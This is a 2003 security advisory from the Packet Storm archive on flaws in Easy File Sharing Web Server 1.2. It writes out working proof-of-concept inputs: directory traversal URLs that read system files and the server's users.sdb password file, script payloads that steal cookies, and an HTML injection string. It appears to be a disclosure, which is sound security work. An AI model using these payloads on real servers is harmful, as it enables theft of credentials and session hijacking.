exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

easyfile.txt

easyfile.txt
Posted Sep 16, 2003
Authored by Dr. Insane

Easy File Sharing Web Server 1.2 is vulnerable to directory traversal bugs, cross site scripting, HTML injection, and password snatching due to them being left in the clear.

tags | exploit, web, xss
SHA-256 | f44612ef4731652eedc76c34971ccef6fbab01c107847e6496e2fa6d924e38f8

easyfile.txt

Change Mirror Download
Advisory for Easy File Sharing web server 1.2...

---

------------------------------------------------------------------
Easy File Sharing Web Server 1.2

------------------------------------------------------------------
-= by Dr_insane (dr_insane@pathfinder.gr) =-



Product:
--------
Easy File Sharing Web Server 1.2


Vunerability(s):
----------------
1.Directory Traversal Bugs
2.XSS vulnerabilities
3.HTML Injection
4.Passwords in clear text

Description of product:
-----------------------
Easy File Sharing Web Server is a file sharing system that allows visitors to upload/download files easily through a Web Browser (IE, Netscape, Opera etc.). It can help you share files with your friends and colleagues. They can download files from your computer or upload files from theirs.They will not be required to install this software or any other software because an internet browser is enough. Easy File Sharing Web Server also provides a Bulletin Board System (BBS, Forum). It allows remote users to post messages and files to the forum.


VUNERABILITY / EXPLOIT
======================
There is multiple vulnerabilities in Postnuke Easy File Sharing Web Server 1.2 as described below.

1.Directory traversing

Easy File Sharing Web Server have a Directory Traversal Vulnerability Using the string '../' in a URL, an attacker can gain read access to any file outside of the intended web-published filesystem directory.

There is not much to expand on this one....

Example:
http://127.0.0.1/../../../autoexec.bat to show autoexec.bat
http://127.0.0.1/.../.../.../program files/Easy File Sharing Web Server/users.sdb get the server password file

Also:
http://127.0.0.1/msg.ghp?forumid=4&id=/../../../../../../../../windows/win.ini
http://127.0.0.1/msg.ghp?forumid=/../../../../../../../../windows/win.ini

etc etc etc

2.XSS vulnerabilities

A vulnerability exists in the Easy File Sharing Web Server that involves incorrect filtering of server signature data. The vulnerability could enable an attacker to hijack web sessions, allowing a range of potential compromises on the targeted host.

The vulnerable urls are:

http://127.0.0.1/newmsg.ghp?forumid=1 Insert Evil javascript code in "Your message field"

The following URL will demonstrate the attack:

Some browsers submit the malicious host header when parsing this request:
Host: <img src="" onerror="alert(document.cookie)">

ex. if we supply this code: <script>alert(document.cookie)</script> we will get:

TEMPLATE:standard;LANG=english; TOKEN:121234122; TOKEN_1=34123123; SHOW_FEATURES=0; db_pass; db_user; SESSIONID=1172; UsserID:dr_insane; PassWD=passtest1111

It is possbile for someone to get the username and the password.In our example
The username is:dr_insane and the password: passtest1111

3.HTML Injection

Any user can inject html code when create a new post.
The bug is in the post icon :

<img src="icon.gif" etc.>
If you create a personalized form with this code: icon.gif">
<script>alert('bug');<script><anytag="
the final code of the post icon is :
<imgsrc="icon.gif"><script>alert('bug');<script><anytag="" etc.>

4.Passwords in clear text

A vulnerability has been identified in Enceladus Server suite allowing malicious, local users to see usernames and passwords.

The problem is that usernames and passwords for the server are stored in clear text in the folder "users.sdb".


Local:
------
Yes

Remote:
-------
We can 0wn the server via remote!


Credits:
--------
Dr_insane
dr_insane@pathfinder.gr , dr_insane@hack.gr
Http://members.lycos.co.uk/r34ct/








----------------------------
Dr_Insane
members.lycos.co.uk/r34ct/
----------------------------

______________________________________________________________________________________
http://mobile.pathfinder.gr - Pathfinder Mobile logos & Ringtones!
http://www.pathfinder.gr - ÄùñåÜí mail áðü ôïí Pathfinder!
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close